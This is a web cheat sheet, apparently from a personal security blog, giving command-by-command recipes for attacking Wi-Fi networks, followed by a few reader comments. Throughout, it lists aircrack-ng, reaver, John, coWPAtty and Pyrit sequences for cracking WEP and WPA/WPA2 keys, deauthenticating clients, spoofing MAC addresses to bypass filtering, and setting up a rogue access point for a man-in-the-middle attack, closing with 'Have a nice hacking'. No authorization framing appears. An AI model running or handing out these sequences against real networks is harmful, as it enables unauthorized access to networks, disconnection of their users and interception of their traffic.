Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]
WIRELESS ANTENNA
Kill Monitor Processes
root@uceka:~# airmon-ng check kill
Open the Monitor Mode
root@uceka:~# ifconfig wlan0 down root@uceka:~# airmon-ng start wlan0 # if you get an error with airmon-ng command, try this ; # iwconfig wlan0 mode monitor # use wlan0 instead of wlan0mon root@uceka:~# ifconfig wlan0 up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0 root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto> #txpower is 30 (generally) #txpower is depends your country, please googling root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
Driver Install (Kali – Alfa Adapter)
root@uceka:~# sudo apt update root@uceka:~# sudo apt upgrade -y root@uceka:~# sudo apt dist-upgrade -y root@uceka:~# sudo reboot now root@uceka:~# sudo apt update root@uceka:~# sudo apt install realtek-rtl88xxau-dkms root@uceka:~# sudo apt install dkms root@uceka:~# git clone https://github.com/aircrack-ng/rtl8812au root@uceka:~# cd rtl8812au/ root@uceka:~# sudo make root@uceka:~# sudo make install
Scan
root@uceka:~# airodump-ng wlan0mon # or root@uceka:~# wifite
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>
Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon root@uceka:~# aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon #Press ‘y’ ; root@uceka:~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2> root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon root@uceka:~# aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon #Press ‘y’ ; root@uceka:~# packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2> root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon root@uceka:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon root@uceka:~# ifconfig wlan0mon down root@uceka:~# macchanger –-mac <VictimMac> wlan0mon root@uceka:~# ifconfig wlan0mon up root@uceka:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon root@uceka:~# aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon root@uceka:~# aircrack-ng <PCAP_of_FileName>
WPA / WPA2 CRACKING
Method 1 : WPS Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# apt-get install reaver root@uceka:~# wash –i wlan0mon root@uceka:~# reaver –i wlan0mon –b <BSSID> -vv –S #or, Specific attack root@uceka:~# reaver –i wlan0mon –c <Channel> -b <BSSID> -p <PinCode> -vv –S
Method 2 : Dictionary Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon root@uceka:~# aircrack-ng –w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
Method 3 : Crack with John The Ripper
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon root@uceka:~# cd /pentest/passwords/john root@uceka:~# ./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e <ESSID> -w - <PCAP_of_FileName> #or root@uceka:~# aircrack-ng <FileName>.cap -J <outFile> root@uceka:~# hccap2john <outFile>.hccap > <JohnOutFile> root@uceka:~# john <JohnOutFile>
Method 4 : Crack with coWPAtty
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon root@uceka:~# cowpatty –r <FileName> -f <Wordlist> -2 –s <SSID> root@uceka:~# genpmk –s <SSID> –f <Wordlist> -d <HashesFileName> root@uceka:~# cowpatty –r <PCAP_of_FileName> -d <HashesFileName> -2 –s <SSID>
Method 5 : Crack with Pyrit
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon root@uceka:~# pyrit –r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough root@uceka:~# pyrit –i <Wordlist> import_passwords root@uceka:~# pyrit –e <ESSID> create_essid root@uceka:~# pyrit batch root@uceka:~# pyrit –r <PCAP_of_FileName> attack_db
Method 6 : Precomputed WPA Keys Database Attack
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon root@uceka:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon root@uceka:~# kwrite ESSID.txt root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt root@uceka:~# airolib-ng NEW_DB --import passwd <DictionaryFile> root@uceka:~# airolib-ng NEW_DB --clean all root@uceka:~# airolib-ng NEW_DB --stats root@uceka:~# airolib-ng NEW_DB --batch root@uceka:~# airolib-ng NEW_DB --verify all root@uceka:~# aircrack-ng –r NEW_DB <Handshaked_PCAP>
FIND HIDDEN SSID
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <Channel> --bssid <BSSID> wlan0mon root@uceka:~# aireplay-ng -0 20 –a <BSSID> -c <VictimMac> wlan0mon
BYPASS MAC FILTERING
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon root@uceka:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon root@uceka:~# ifconfig wlan0mon down root@uceka:~# macchanger –-mac <VictimMac> wlan0mon root@uceka:~# ifconfig wlan0mon up root@uceka:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
MAN IN THE MIDDLE ATTACK
root@uceka:~# airmon-ng start wlan0 root@uceka:~# airbase-ng –e “<FakeBSSID>” wlan0mon #apt-get install bridge-utils root@uceka:~# brctl addbr <VariableName> root@uceka:~# brctl addif <VariableName> wlan0mon root@uceka:~# brctl addif <VariableName> at0 root@uceka:~# ifconfig eth0 0.0.0.0 up root@uceka:~# ifconfig at0 0.0.0.0 up root@uceka:~# ifconfig <VariableName> up root@uceka:~# aireplay-ng –deauth 0 –a <victimBSSID> wlan0mon root@uceka:~# dhclient3 <VariableName> & root@uceka:~# wireshark & ;select <VariableName> interface
Have a nice hacking 😉
29 March 2016 at 09:34
[…] Uceka […]
08 December 2018 at 01:10
[…] Uceka […]
17 January 2019 at 09:56
Great job!!
05 October 2019 at 22:15
Ağda mac filtrelemesi varsa ve SKA cracklemek istiyorsak nasıl bir yol izleriz? Yukarıda yazana göre istemci mac adresi spoof edip deauth. atmak lazım. O zaman biz de ağdan düşmez miyiz?
19 July 2020 at 17:46
[…] ref: uceka.com […]